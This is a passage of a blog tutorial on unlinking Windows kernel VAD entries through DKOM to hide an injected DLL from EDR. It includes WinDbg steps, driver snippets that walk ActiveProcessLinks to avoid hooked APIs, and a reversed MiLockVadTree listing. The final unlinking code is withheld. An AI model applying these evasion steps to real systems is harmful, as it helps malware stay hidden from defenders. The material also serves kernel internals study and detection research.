VAD Unlinking

In this blog we will dive a little deeper and understand how memory regions are represented in the OS and how these kernel structures can be tampered with to hide a memory region in a process. This technique is used in my project YetAnotherReflectiveLoader. I have intentionally not uploaded this specific code for security reasons, but we will talk about the logic here in this blog.

Setup

Everything we are going to talk about was done on the latest Windows and Defender versions, which at the time of writing are:

Windows OS

- Edition: Windows 11 Pro

- Version: 25H2

- OS Build: 26200.7840

Defender Engine

- Client: 4.18.26010.5

- Engine: 1.1.26010.1

- AV / AS: 1.445.222.0

Environment

Everything is built and tested against modern security features:

✓ Real-time protection

✓ Tamper Protection

✓ Memory integrity

✓ Memory access protection

✗ Microsoft Vulnerable Driver Blocklist

This is serious work, so it should be handled with care. It is made purely for education and research purposes.

Virtual Address Descriptor



A Virtual Address Descriptor (VAD) is a core kernel data structure used by the Windows operating system's Memory Manager to keep track of the virtual memory allocated to a specific process. The kernel maintains a VAD tree for each process.

The VAD tree is built as an AVL tree: a self-balancing Binary Search Tree (BST) in which the heights of the left and right subtrees of any node differ by at most one.
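To make the balance rule concrete, here is a minimal user-mode sketch that checks the AVL property on a toy tree. ToyNode, Height and IsAvlBalanced are hypothetical names made up for this illustration and have nothing to do with the real kernel structures.

```cpp
#include <algorithm>
#include <cstdlib>

// Toy node for illustration only; not a kernel structure.
struct ToyNode {
    ToyNode* left = nullptr;
    ToyNode* right = nullptr;
};

// Height counted in nodes: an empty subtree has height 0.
int Height(const ToyNode* n) {
    if (n == nullptr) return 0;
    return 1 + std::max(Height(n->left), Height(n->right));
}

// True when, at every node, the two subtree heights differ by at most one.
bool IsAvlBalanced(const ToyNode* n) {
    if (n == nullptr) return true;
    const int diff = std::abs(Height(n->left) - Height(n->right));
    return diff <= 1 && IsAvlBalanced(n->left) && IsAvlBalanced(n->right);
}
```

A chain of three nodes hanging off the left side fails the check, while adding a single right child to the root makes it pass again.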

VAD tree image from tophertimzen: https://www.tophertimzen.com/resources/cs407/slides/week03_01-MemoryInternals.html

To interact with it, we must locate the root of this tree inside the massive EPROCESS structure.

EPROCESS Structure Offset (Windows 11)

struct _RTL_AVL_TREE VadRoot;

// 0x558

The struct _RTL_AVL_TREE just contains a pointer to another structure, _RTL_BALANCED_NODE, which looks like:


//0x18 bytes (sizeof)

struct _RTL_BALANCED_NODE

{

union

{

struct _RTL_BALANCED_NODE* Children[2]; //0x0

struct

{

struct _RTL_BALANCED_NODE* Left; //0x0

struct _RTL_BALANCED_NODE* Right; //0x8

};

};

union

{

struct

{

UCHAR Red:1; //0x10

UCHAR Balance:2; //0x10

};

ULONGLONG ParentValue; //0x10

};

};



VAD in WinDbg

We can use WinDbg to look at all the VAD entries of a process from the kernel level. In this example, we will analyze the VAD entries of notepad.exe, which has just been injected with a DLL.

Locate _EPROCESS

To do this, we must first locate the _EPROCESS structure for our target.

Note: The 0 0 flags tell WinDbg to give us a minimal summary instead of flooding the terminal with every single thread and handle attached to the process.

Eprocess of notepad.exe

As seen in the highlighted output, WinDbg returns the exact memory location of the _EPROCESS structure: ffffae059b7fa080



Switch Context

We now have the absolute kernel address (0xffffae059b7fa080), which we will use to switch the context of the debugger and analyze its memory.

Note: The /p flag translates all page table entries to the target process, and the /r flag forces WinDbg to reload user-mode symbols for this specific process context.

Context switched to notepad.exe



VAD Entries

Now that we have successfully switched our debugger context to the notepad.exe process, we can ask WinDbg to dump the entire Virtual Address Descriptor tree for this specific process.

All we need to do is execute the !vad command:

VAD entries in notepad

Look closely at the output list. Almost every single entry is marked as READONLY or READWRITE. But right near the top of the list, something screams out at us:

That EXECUTE_READWRITE (RWX) region at 0x180000 is our manually mapped DLL. Normal Windows applications rarely allocate memory with RWX permissions because it violates the principle of least privilege. To a malware analyst or a kernel-level EDR, an RWX VAD entry in a benign process like Notepad is a blazing alarm indicating that code injection has occurred.

Preface

Now that we know how these injected regions look in memory, the next step is to hide them. There are many ways to do this. Some try to make the region look like any other legitimately mapped .dll, but these are easily detected. We will instead completely remove the VAD entry for the region.

This is called Direct Kernel Object Manipulation (DKOM), and in this blog I assume you already have your driver mapped.

Attach to Process' Stack

Because our driver runs in kernel space (Ring 0), its code executes in whatever process context the current thread happens to have, typically the System process or the process that issued the request. Either way, it is not running in notepad.exe's address space, so it currently has no view of what is inside notepad.exe's memory.

Before we can interact with the target's VAD tree, we must attach our driver thread to the target's virtual address space. To do that, we first need a pointer to the target's _EPROCESS structure.

Resolving the EPROCESS Block

PEPROCESS pTarget_process = nullptr;

status = FindEPROCESSviaPID(sResources->hTargetPid, &pTarget_process);

if(status != STATUS_SUCCESS)

{

LOG_W("[baaaa_bae] [-] Cant find the EPROCESS structure of the target process 0x%X\n", status);

return CleanStuffUp(status, pIrp);

}

We cannot safely rely on standard exported kernel APIs like PsLookupProcessByProcessId, because EDRs aggressively hook those functions to monitor which drivers are touching which processes.

Instead, our custom FindEPROCESSviaPID function grabs the System process's EPROCESS block and manually walks the ActiveProcessLinks doubly-linked list until it finds a struct matching our target's Process ID. This bypasses API hooking entirely.

We have resolved the pointer to the target's _EPROCESS structure, but possessing a pointer is not enough. Our driver thread is still executing in its original process context. If we try to read or write user-mode virtual addresses right now, they will resolve against that context, not the target's.

// Store the current thread's state before we hijack it

KAPC_STATE apc_state;

// Force the current kernel thread to attach to the target process's memory space

KeStackAttachProcess(pTarget_process, &apc_state);

Locks

Before touching the VAD tree, we need to understand locks. The VAD tree is a shared structure accessed by multiple threads. If Thread A reads it while Thread B is unlinking a node from it, Thread A can follow a stale or half-updated pointer. This race condition typically ends in a bug check such as PAGE_FAULT_IN_NONPAGED_AREA.

Locks prevent this by enforcing strict, synchronized access. Kernel locks are divided into two main categories based on what a thread does when forced to wait:

IRQL: PASSIVE (0)

If the lock is taken, the waiting thread is put to sleep by the OS so the CPU can go do other work. These operate at low IRQLs (PASSIVE_LEVEL or APC_LEVEL).

SAFE TO DO: Allocate paged memory, read/write files, or perform I/O (like LOG_W printing to the console).

IRQL: DISPATCH (2)

If the lock is taken, the waiting thread busy-waits in a loop on the CPU until the lock is released. Acquiring a spinlock raises our processor's IRQL to DISPATCH_LEVEL.

FATAL RULE: We cannot sleep, allocate paged pool memory, or perform I/O. Doing so leads to a BSOD.
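The spinning behaviour can be illustrated in user mode with a tiny test-and-set lock. This is only a sketch of the concept: ToySpinLock is a hypothetical class built on std::atomic, and it does not model IRQL or any real kernel spinlock API.

```cpp
#include <atomic>

// Hypothetical user-mode spinlock, for illustration only.
class ToySpinLock {
public:
    // One attempt: returns true if this call took the lock.
    bool try_lock() {
        return !held_.exchange(true, std::memory_order_acquire);
    }

    // Busy-wait: the caller keeps the CPU and retries until the holder releases.
    void lock() {
        while (!try_lock()) {
            // spin
        }
    }

    void unlock() {
        held_.store(false, std::memory_order_release);
    }

private:
    std::atomic<bool> held_{false};
};
```

A blocking lock such as std::mutex would instead hand the CPU back to the scheduler while waiting, which is exactly what is not allowed once the IRQL has been raised.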

Reversing the Lock

As VAD trees are not documented by Microsoft, we need to figure out how to acquire the lock before interacting with the tree. We will use IDA to reverse some of the functions related to the VAD.

0x01 Reversing MiInsertVad

We want to know what the OS does to lock the tree. The OS will definitely have to lock the tree if it wants to insert a node and hence we can look at MiInsertVad.

Opening MiInsertVad in IDA reveals:

.text:00000001402A8151 loc_1402A8151: ; CODE XREF: MiInsertVad+1D1↓j

.text:00000001402A8151 inc qword ptr [rbx+568h]

.text:00000001402A8158 test r12b, 1

.text:00000001402A815C jnz loc_1402A8267

.text:00000001402A8162 mov ecx, 2

.text:00000001402A8167 call MiLockVadTree

.text:00000001402A816C mov bpl, al

We can clearly see that it calls MiLockVadTree to acquire a lock and passes 2 as a parameter. We will have to figure out how this function works and then we might be able to simply use this function for locking the tree.

For the same OS build, Windows 11 Pro makes a MiLockVadTree call followed by MiUnlockVadTree, but Windows 11 Home does not. Instead, it does something like:

nt!MiInsertVad+0x166:

fffff803`7545fca6 4d8bc7 mov r8,r15

fffff803`7545fca9 488bd6 mov rdx,rsi

fffff803`7545fcac 488bcf mov rcx,rdi

fffff803`7545fcaf e82cefffff call nt!MiPostInsertVad (fffff803`7545ebe0)

0x02 Reversing MiLockVadTree

The complete, unedited logic of MiLockVadTree is reproduced below, first as raw IDA disassembly and then as the generated HexRays pseudocode.

MiLockVadTree function - IDA Pro Assembly

.text:00000001402B54D0

.text:00000001402B54D0 ; char __fastcall MiLockVadTree(char a1)

.text:00000001402B54D0 MiLockVadTree proc near ; CODE XREF: MiStoreGetVadForAddress+B↑p

.text:00000001402B54D0 ; MiResolveMappedFileFault+5E5↑p ...

.text:00000001402B54D0

.text:00000001402B54D0 arg_10 = qword ptr 18h

.text:00000001402B54D0 arg_18 = qword ptr 20h

.text:00000001402B54D0

.text:00000001402B54D0 mov [rsp+arg_18], rbx

.text:00000001402B54D5 push rdi

.text:00000001402B54D6 sub rsp, 20h

.text:00000001402B54DA mov rax, gs:188h

.text:00000001402B54E3 mov rbx, [rax+0B8h]

.text:00000001402B54EA mov eax, ecx

.text:00000001402B54EC and eax, 1

.text:00000001402B54EF mov rbx, [rbx+410h]

.text:00000001402B54F6 add rbx, 3ECh

.text:00000001402B54FD test cl, 2

.text:00000001402B5500 jnz loc_1402B558A

.text:00000001402B5506 test eax, eax

.text:00000001402B5508 jz short loc_1402B5537

.text:00000001402B550A test byte ptr cs:PerfGlobalGroupMask+6, 21h

.text:00000001402B5511 jnz loc_1402B5601

.text:00000001402B5517

.text:00000001402B5517 loc_1402B5517: ; CODE XREF: MiLockVadTree+139↓j

.text:00000001402B5517 prefetchw byte ptr [rbx]

.text:00000001402B551A mov eax, [rbx]

.text:00000001402B551C btr eax, 1Fh

.text:00000001402B5520

.text:00000001402B5520 loc_1402B5520: ; CODE XREF: MiLockVadTree+AC↓j

.text:00000001402B5520 lea ecx, [rax+1]

.text:00000001402B5523 lock cmpxchg [rbx], ecx

.text:00000001402B5527 jnz short loc_1402B557A

.text:00000001402B5529

.text:00000001402B5529 loc_1402B5529: ; CODE XREF: MiLockVadTree+B8↓j

.text:00000001402B5529 ; MiLockVadTree+F1↓j

.text:00000001402B5529 mov al, 11h

.text:00000001402B552B

.text:00000001402B552B loc_1402B552B: ; CODE XREF: MiLockVadTree+A8↓j

.text:00000001402B552B ; MiLockVadTree+223↓j

.text:00000001402B552B mov rbx, [rsp+28h+arg_18]

.text:00000001402B5530 add rsp, 20h

.text:00000001402B5534 pop rdi

.text:00000001402B5535 retn

.text:00000001402B5535 ; ---------------------------------------------------------------------------

.text:00000001402B5536 db 0CCh

.text:00000001402B5537 ; ---------------------------------------------------------------------------

.text:00000001402B5537

.text:00000001402B5537 loc_1402B5537: ; CODE XREF: MiLockVadTree+38↑j

.text:00000001402B5537 mov rdi, cr8

.text:00000001402B553B mov eax, 2

.text:00000001402B5540 mov cr8, rax

.text:00000001402B5544 cmp cs:KiIrqlFlags, 0

.text:00000001402B554B jnz loc_1402B5774

.text:00000001402B5551

.text:00000001402B5551 loc_1402B5551: ; CODE XREF: MiLockVadTree+2B0↓j

.text:00000001402B5551 test byte ptr cs:PerfGlobalGroupMask+6, 21h

.text:00000001402B5558 jnz loc_1402B56D5

.text:00000001402B555E

.text:00000001402B555E loc_1402B555E: ; CODE XREF: MiLockVadTree+20D↓j

.text:00000001402B555E prefetchw byte ptr [rbx]

.text:00000001402B5561 mov eax, [rbx]

.text:00000001402B5563 btr eax, 1Fh

.text:00000001402B5567

.text:00000001402B5567 loc_1402B5567: ; CODE XREF: MiLockVadTree+159↓j

.text:00000001402B5567 lea ecx, [rax+1]

.text:00000001402B556A lock cmpxchg [rbx], ecx

.text:00000001402B556E jnz loc_1402B5627

.text:00000001402B5574

.text:00000001402B5574 loc_1402B5574: ; CODE XREF: MiLockVadTree+16B↓j

.text:00000001402B5574 movzx eax, dil

.text:00000001402B5578 jmp short loc_1402B552B

.text:00000001402B557A ; ---------------------------------------------------------------------------

.text:00000001402B557A

.text:00000001402B557A loc_1402B557A: ; CODE XREF: MiLockVadTree+57↑j

.text:00000001402B557A test eax, eax

.text:00000001402B557C jns short loc_1402B5520

.text:00000001402B557E mov dl, 0FFh

.text:00000001402B5580 mov rcx, rbx

.text:00000001402B5583 call ExpWaitForSpinLockSharedAndAcquire

.text:00000001402B5588 jmp short loc_1402B5529

.text:00000001402B558A ; ---------------------------------------------------------------------------

.text:00000001402B558A

.text:00000001402B558A loc_1402B558A: ; CODE XREF: MiLockVadTree+30↑j

.text:00000001402B558A test eax, eax

.text:00000001402B558C jz loc_1402B5640

.text:00000001402B5592 test byte ptr cs:PerfGlobalGroupMask+6, 21h

.text:00000001402B5599 jnz loc_1402B56F8

.text:00000001402B559F

.text:00000001402B559F loc_1402B559F: ; CODE XREF: MiLockVadTree+230↓j

.text:00000001402B559F xor edi, edi

.text:00000001402B55A1 lock bts dword ptr [rbx], 1Fh

.text:00000001402B55A6 jnb short loc_1402B55B4

.text:00000001402B55A8 mov dl, 0FFh

.text:00000001402B55AA mov rcx, rbx

.text:00000001402B55AD call ExpWaitForSpinLockExclusiveAndAcquire

.text:00000001402B55B2 mov edi, eax

.text:00000001402B55B4

.text:00000001402B55B4 loc_1402B55B4: ; CODE XREF: MiLockVadTree+D6↑j

.text:00000001402B55B4 mov ecx, [rbx]

.text:00000001402B55B6 mov eax, ecx

.text:00000001402B55B8 btr eax, 1Eh

.text:00000001402B55BC cmp eax, 80000000h

.text:00000001402B55C1 jz loc_1402B5529

.text:00000001402B55C7

.text:00000001402B55C7 loc_1402B55C7: ; CODE XREF: MiLockVadTree+121↓j

.text:00000001402B55C7 bt ecx, 1Eh

.text:00000001402B55CB jb short loc_1402B55D4

.text:00000001402B55CD lock or dword ptr [rbx], 40000000h

.text:00000001402B55D4

.text:00000001402B55D4 loc_1402B55D4: ; CODE XREF: MiLockVadTree+FB↑j

.text:00000001402B55D4 inc edi

.text:00000001402B55D6 test cs:HvlLongSpinCountMask, edi

.text:00000001402B55DC jz loc_1402B574D

.text:00000001402B55E2

.text:00000001402B55E2 loc_1402B55E2: ; CODE XREF: MiLockVadTree+285↓j

.text:00000001402B55E2 ; MiLockVadTree+292↓j

.text:00000001402B55E2 pause

.text:00000001402B55E4

.text:00000001402B55E4 loc_1402B55E4: ; CODE XREF: MiLockVadTree+29F↓j

.text:00000001402B55E4 mov ecx, [rbx]

.text:00000001402B55E6 mov eax, ecx

.text:00000001402B55E8 btr eax, 1Eh

.text:00000001402B55EC cmp eax, 80000000h

.text:00000001402B55F1 jnz short loc_1402B55C7

.text:00000001402B55F3 mov al, 11h

.text:00000001402B55F5 mov rbx, [rsp+28h+arg_18]

.text:00000001402B55FA add rsp, 20h

.text:00000001402B55FE pop rdi

.text:00000001402B55FF retn

.text:00000001402B55FF ; ---------------------------------------------------------------------------

.text:00000001402B5600 db 0CCh

.text:00000001402B5601 ; ---------------------------------------------------------------------------

.text:00000001402B5601

.text:00000001402B5601 loc_1402B5601: ; CODE XREF: MiLockVadTree+41↑j

.text:00000001402B5601 mov ecx, cs:PopHibernateInProgress

.text:00000001402B5607 test ecx, ecx

.text:00000001402B5609 jnz loc_1402B5517

.text:00000001402B560F mov dl, 0FFh

.text:00000001402B5611 mov rcx, rbx

.text:00000001402B5614 call ExpAcquireSpinLockSharedAtDpcLevelInstrumented

.text:00000001402B5619 mov al, 11h

.text:00000001402B561B mov rbx, [rsp+28h+arg_18]

.text:00000001402B5620 add rsp, 20h

.text:00000001402B5624 pop rdi

.text:00000001402B5625 retn

.text:00000001402B5625 ; ---------------------------------------------------------------------------

.text:00000001402B5626 db 0CCh

.text:00000001402B5627 ; ---------------------------------------------------------------------------

.text:00000001402B5627

.text:00000001402B5627 loc_1402B5627: ; CODE XREF: MiLockVadTree+9E↑j

.text:00000001402B5627 test eax, eax

.text:00000001402B5629 jns loc_1402B5567

.text:00000001402B562F movzx edx, dil

.text:00000001402B5633 mov rcx, rbx

.text:00000001402B5636 call ExpWaitForSpinLockSharedAndAcquire

.text:00000001402B563B jmp loc_1402B5574

.text:00000001402B5640 ; ---------------------------------------------------------------------------

.text:00000001402B5640

.text:00000001402B5640 loc_1402B5640: ; CODE XREF: MiLockVadTree+BC↑j

.text:00000001402B5640 ; DATA XREF: .rdata:000000014006B748↑o ...

.text:00000001402B5640 mov [rsp+28h+arg_10], rsi

.text:00000001402B5645 mov rsi, cr8

.text:00000001402B5649 mov eax, 2

.text:00000001402B564E mov cr8, rax

.text:00000001402B5652 cmp cs:KiIrqlFlags, 0

.text:00000001402B5659 jnz loc_1402B57AC

.text:00000001402B565F

.text:00000001402B565F loc_1402B565F: ; CODE XREF: MiLockVadTree+2E8↓j

.text:00000001402B565F test byte ptr cs:PerfGlobalGroupMask+6, 21h

.text:00000001402B5666 jnz loc_1402B571E

.text:00000001402B566C

.text:00000001402B566C loc_1402B566C: ; CODE XREF: MiLockVadTree+256↓j

.text:00000001402B566C xor edi, edi

.text:00000001402B566E lock bts dword ptr [rbx], 1Fh

.text:00000001402B5673 jnb short loc_1402B5683

.text:00000001402B5675 movzx edx, sil

.text:00000001402B5679 mov rcx, rbx

.text:00000001402B567C call ExpWaitForSpinLockExclusiveAndAcquire

.text:00000001402B5681 mov edi, eax

.text:00000001402B5683

.text:00000001402B5683 loc_1402B5683: ; CODE XREF: MiLockVadTree+1A3↑j

.text:00000001402B5683 mov eax, [rbx]

.text:00000001402B5685 mov ecx, eax

.text:00000001402B5687 btr ecx, 1Eh

.text:00000001402B568B cmp ecx, 80000000h

.text:00000001402B5691 jz short loc_1402B56C0

.text:00000001402B5693

.text:00000001402B5693 loc_1402B5693: ; CODE XREF: MiLockVadTree+1EE↓j

.text:00000001402B5693 bt eax, 1Eh

.text:00000001402B5697 jb short loc_1402B56A0

.text:00000001402B5699 lock or dword ptr [rbx], 40000000h

.text:00000001402B56A0

.text:00000001402B56A0 loc_1402B56A0: ; CODE XREF: MiLockVadTree+1C7↑j

.text:00000001402B56A0 inc edi

.text:00000001402B56A2 test cs:HvlLongSpinCountMask, edi

.text:00000001402B56A8 jz loc_1402B5785

.text:00000001402B56AE

.text:00000001402B56AE loc_1402B56AE: ; CODE XREF: MiLockVadTree+2BD↓j

.text:00000001402B56AE ; MiLockVadTree+2CA↓j

.text:00000001402B56AE pause

.text:00000001402B56B0

.text:00000001402B56B0 loc_1402B56B0: ; CODE XREF: MiLockVadTree+2D7↓j

.text:00000001402B56B0 mov eax, [rbx]

.text:00000001402B56B2 mov ecx, eax

.text:00000001402B56B4 btr ecx, 1Eh

.text:00000001402B56B8 cmp ecx, 80000000h

.text:00000001402B56BE jnz short loc_1402B5693

.text:00000001402B56C0

.text:00000001402B56C0 loc_1402B56C0: ; CODE XREF: MiLockVadTree+1C1↑j

.text:00000001402B56C0 movzx eax, sil

.text:00000001402B56C4 mov rsi, [rsp+28h+arg_10]

.text:00000001402B56C9 mov rbx, [rsp+28h+arg_18]

.text:00000001402B56CE add rsp, 20h

.text:00000001402B56D2 pop rdi

.text:00000001402B56D3 retn

.text:00000001402B56D3 ; ---------------------------------------------------------------------------

.text:00000001402B56D4 byte_1402B56D4 db 0CCh ; DATA XREF: .pdata:00000001400E3EA0↑o

.text:00000001402B56D4 ; .pdata:00000001400E3EAC↑o

.text:00000001402B56D5 ; ---------------------------------------------------------------------------

.text:00000001402B56D5

.text:00000001402B56D5 loc_1402B56D5: ; CODE XREF: MiLockVadTree+88↑j

.text:00000001402B56D5 mov eax, cs:PopHibernateInProgress

.text:00000001402B56DB test eax, eax

.text:00000001402B56DD jnz loc_1402B555E

.text:00000001402B56E3 movzx edx, dil

.text:00000001402B56E7 mov rcx, rbx

.text:00000001402B56EA call ExpAcquireSpinLockSharedAtDpcLevelInstrumented

.text:00000001402B56EF movzx eax, dil

.text:00000001402B56F3 jmp loc_1402B552B

.text:00000001402B56F8 ; ---------------------------------------------------------------------------

.text:00000001402B56F8

.text:00000001402B56F8 loc_1402B56F8: ; CODE XREF: MiLockVadTree+C9↑j

.text:00000001402B56F8 mov ecx, cs:PopHibernateInProgress

.text:00000001402B56FE test ecx, ecx

.text:00000001402B5700 jnz loc_1402B559F

.text:00000001402B5706 mov dl, 0FFh

.text:00000001402B5708 mov rcx, rbx

.text:00000001402B570B call ExpAcquireSpinLockExclusiveAtDpcLevelInstrumented

.text:00000001402B5710 mov al, 11h

.text:00000001402B5712 mov rbx, [rsp+28h+arg_18]

.text:00000001402B5717 add rsp, 20h

.text:00000001402B571B pop rdi

.text:00000001402B571C retn

.text:00000001402B571C ; ---------------------------------------------------------------------------

.text:00000001402B571D align 2

.text:00000001402B571E

.text:00000001402B571E loc_1402B571E: ; CODE XREF: MiLockVadTree+196↑j

.text:00000001402B571E ; DATA XREF: .pdata:00000001400E3EAC↑o ...

.text:00000001402B571E mov eax, cs:PopHibernateInProgress

.text:00000001402B5724 test eax, eax

.text:00000001402B5726 jnz loc_1402B566C

.text:00000001402B572C movzx edx, sil

.text:00000001402B5730 mov rcx, rbx

.text:00000001402B5733 call ExpAcquireSpinLockExclusiveAtDpcLevelInstrumented

.text:00000001402B5738 mov rbx, [rsp+28h+arg_18]

.text:00000001402B573D movzx eax, sil

.text:00000001402B5741 mov rsi, [rsp+28h+arg_10]

.text:00000001402B5746 add rsp, 20h

.text:00000001402B574A pop rdi

.text:00000001402B574B retn

.text:00000001402B574B ; ---------------------------------------------------------------------------

.text:00000001402B574C db 0CCh

.text:00000001402B574D ; ---------------------------------------------------------------------------

.text:00000001402B574D

.text:00000001402B574D loc_1402B574D: ; CODE XREF: MiLockVadTree+10C↑j

.text:00000001402B574D ; DATA XREF: .pdata:00000001400E3EB8↑o ...

.text:00000001402B574D mov eax, cs:HvlEnlightenments

.text:00000001402B5753 test al, 40h

.text:00000001402B5755 jz loc_1402B55E2

.text:00000001402B575B call KiCheckVpBackingLongSpinWaitHypercall

.text:00000001402B5760 test al, al

.text:00000001402B5762 jz loc_1402B55E2

.text:00000001402B5768 mov ecx, edi

.text:00000001402B576A call HvlNotifyLongSpinWait

.text:00000001402B576F jmp loc_1402B55E4

.text:00000001402B5774 ; ---------------------------------------------------------------------------

.text:00000001402B5774

.text:00000001402B5774 loc_1402B5774: ; CODE XREF: MiLockVadTree+7B↑j

.text:00000001402B5774 movzx edx, al

.text:00000001402B5777 movzx ecx, dil

.text:00000001402B577B call KiRaiseIrqlProcessIrqlFlags

.text:00000001402B5780 jmp loc_1402B5551

.text:00000001402B5785 ; ---------------------------------------------------------------------------

.text:00000001402B5785

.text:00000001402B5785 loc_1402B5785: ; CODE XREF: MiLockVadTree+1D8↑j

.text:00000001402B5785 ; DATA XREF: .pdata:00000001400E3EC4↑o ...

.text:00000001402B5785 mov eax, cs:HvlEnlightenments

.text:00000001402B578B test al, 40h

.text:00000001402B578D jz loc_1402B56AE

.text:00000001402B5793 call KiCheckVpBackingLongSpinWaitHypercall

.text:00000001402B5798 test al, al

.text:00000001402B579A jz loc_1402B56AE

.text:00000001402B57A0 mov ecx, edi

.text:00000001402B57A2 call HvlNotifyLongSpinWait

.text:00000001402B57A7 jmp loc_1402B56B0

.text:00000001402B57AC ; ---------------------------------------------------------------------------

.text:00000001402B57AC

.text:00000001402B57AC loc_1402B57AC: ; CODE XREF: MiLockVadTree+189↑j

.text:00000001402B57AC movzx edx, al

.text:00000001402B57AF movzx ecx, sil

.text:00000001402B57B3 call KiRaiseIrqlProcessIrqlFlags

.text:00000001402B57B8 jmp loc_1402B565F

.text:00000001402B57B8 MiLockVadTree endp

MiLockVadTree function - HexRays Pseudocode

char __fastcall MiLockVadTree(char a1)

{

volatile signed __int32 *v1; // rbx

signed __int32 v2; // eax

signed __int32 v3; // ett

unsigned __int8 v5; // di

signed __int32 v6; // eax

signed __int32 v7; // ett

unsigned int v8; // edi

volatile signed __int32 v9; // ecx

unsigned __int8 CurrentIrql; // si

unsigned int v11; // edi

volatile signed __int32 i; // eax

v1 = (volatile signed __int32 *)&KeGetCurrentThread()->ApcState.Process[2].ActiveProcessors[3].StaticBitmap[25] + 1;

if ( (a1 & 2) != 0 )

{

if ( (a1 & 1) != 0 )

{

if ( (BYTE6(PerfGlobalGroupMask) & 0x21) == 0 || PopHibernateInProgress )

{

v8 = 0;

if ( _interlockedbittestandset(v1, 0x1Fu) )

v8 = ExpWaitForSpinLockExclusiveAndAcquire(v1, -1);

v9 = *v1;

if ( (*v1 & 0xBFFFFFFF) == 0x80000000 )

return 17;

do

{

if ( (v9 & 0x40000000) == 0 )

_InterlockedOr(v1, 0x40000000u);

if ( (++v8 & HvlLongSpinCountMask) == 0

&& (HvlEnlightenments & 0x40) != 0

&& (unsigned __int8)KiCheckVpBackingLongSpinWaitHypercall() )

{

HvlNotifyLongSpinWait(v8);

}

else

{

_mm_pause();

}

v9 = *v1;

}

while ( (*v1 & 0xBFFFFFFF) != 0x80000000 );

return 17;

}

else

{

ExpAcquireSpinLockExclusiveAtDpcLevelInstrumented(v1, -1);

return 17;

}

}

else

{

CurrentIrql = KeGetCurrentIrql();

__writecr8(2uLL);

if ( KiIrqlFlags )

KiRaiseIrqlProcessIrqlFlags(CurrentIrql);

if ( (BYTE6(PerfGlobalGroupMask) & 0x21) == 0 || PopHibernateInProgress )

{

v11 = 0;

if ( _interlockedbittestandset(v1, 0x1Fu) )

v11 = ExpWaitForSpinLockExclusiveAndAcquire(v1, CurrentIrql);

for ( i = *v1; (*v1 & 0xBFFFFFFF) != 0x80000000; i = *v1 )

{

if ( (i & 0x40000000) == 0 )

_InterlockedOr(v1, 0x40000000u);

if ( (++v11 & HvlLongSpinCountMask) == 0

&& (HvlEnlightenments & 0x40) != 0

&& (unsigned __int8)KiCheckVpBackingLongSpinWaitHypercall() )

{

HvlNotifyLongSpinWait(v11);

}

else

{

_mm_pause();

}

}

return CurrentIrql;

}

else

{

ExpAcquireSpinLockExclusiveAtDpcLevelInstrumented(v1, CurrentIrql);

return CurrentIrql;

}

}

}

else

{

if ( (a1 & 1) != 0 )

{

if ( (BYTE6(PerfGlobalGroupMask) & 0x21) != 0 && !PopHibernateInProgress )

{

ExpAcquireSpinLockSharedAtDpcLevelInstrumented(v1, -1);

return 17;

}

_m_prefetchw((const void *)v1);

v2 = *v1 & 0x7FFFFFFF;

while ( 1 )

{

v3 = v2;

v2 = _InterlockedCompareExchange(v1, v2 + 1, v2);

if ( v3 == v2 )

break;

if ( v2 < 0 )

{

ExpWaitForSpinLockSharedAndAcquire(v1, -1);

return 17;

}

}

return 17;

}

v5 = KeGetCurrentIrql();

__writecr8(2uLL);

if ( KiIrqlFlags )

KiRaiseIrqlProcessIrqlFlags(v5);

if ( (BYTE6(PerfGlobalGroupMask) & 0x21) == 0 || PopHibernateInProgress )

{

_m_prefetchw((const void *)v1);

v6 = *v1 & 0x7FFFFFFF;

while ( 1 )

{

v7 = v6;

v6 = _InterlockedCompareExchange(v1, v6 + 1, v6);

if ( v7 == v6 )

break;

if ( v6 < 0 )

{

ExpWaitForSpinLockSharedAndAcquire(v1, v5);

return v5;

}

}

return v5;

}

else

{

ExpAcquireSpinLockSharedAtDpcLevelInstrumented(v1, v5);

return v5;

}

}

}

We need to open up MiLockVadTree to understand what the passed argument does, what the function returns, and how it locks the tree. We can then write a custom function that performs the same steps as MiLockVadTree in reverse.

IDA Function Signature

When opening the function in IDA's decompiler, we can see the resolved function signature expects exactly one 8-bit character argument:

char __fastcall MiLockVadTree(char a1)

This makes complete sense. If we look back at the raw assembly during the call inside MiInsertVad, we can see the CPU moving the value 2 into the ecx register right before executing the call.

.text:00000001402A8162 mov ecx, 2

.text:00000001402A8167 call MiLockVadTree

(In the x64 __fastcall calling convention, the first integer argument is always passed via the RCX/ECX/CL register.)

Looking at the decompiled code for MiLockVadTree, we are faced with a massive block of nested if/else statements. However, because we observed the CPU moving 2 into the ecx register, we know exactly which execution path our call will take: a1 == 2.

Let's trace exactly how the Windows Kernel handles this specific parameter:

Target else Block Reached

KeGetCurrentIrql();

__writecr8(2uLL);

if (...) {

ExpWaitForSpinLockExclusiveAndAcquire(...);

} else {

ExpAcquireSpinLockExclusiveAtDpcLevelInstrumented(...);

}

By tracing the bitwise logic, we isolated the exact block of code the OS executes when locking the VAD tree.
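The branch selection in the pseudocode can be modelled as a pure function of the two low bits of a1. The sketch below only mirrors the if/else structure shown in the decompilation. LockPath and DecodeLockFlags are hypothetical names, and the meaning attached to each bit is my reading of the pseudocode, not documented behaviour.

```cpp
#include <cstdint>

// Hypothetical description of which path the pseudocode takes.
struct LockPath {
    bool exclusive;    // (a1 & 2) != 0: the exclusive-acquire helpers are used
    bool raises_irql;  // (a1 & 1) == 0: the function writes CR8 = 2 itself
};

// Models only the branch selection; no locking happens here.
constexpr LockPath DecodeLockFlags(std::uint8_t a1) {
    return LockPath{(a1 & 2) != 0, (a1 & 1) == 0};
}
```

With a1 == 2 this yields the exclusive path that raises the IRQL and returns the previous IRQL, which matches the block isolated above. The paths with bit 0 set skip the CR8 write and return the constant 17.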

The code calls __writecr8(2). The CR8 hardware register controls the CPU's Task Priority Register (TPR). By writing a 2 to it, the OS is manually elevating the thread's IRQL to DISPATCH_LEVEL to prevent context switching while it holds the lock.

Depending on the system tracing state (the PerfGlobalGroupMask check), it either sets the lock bit inline and falls back to ExpWaitForSpinLockExclusiveAndAcquire when the lock is already held, or it calls ExpAcquireSpinLockExclusiveAtDpcLevelInstrumented.

Conclusion: The VAD Tree is protected by an Exclusive Spinlock running at DISPATCH_LEVEL!

But we still need to find the lock that it uses. To do this, we look at the start of the function, where we can see exactly what it is accessing.

.text:00000001402B54DA mov rax, gs:188h

.text:00000001402B54E3 mov rbx, [rax+0B8h]

.text:00000001402B54EA mov eax, ecx

.text:00000001402B54EC and eax, 1

.text:00000001402B54EF mov rbx, [rbx+410h]

.text:00000001402B54F6 add rbx, 3ECh

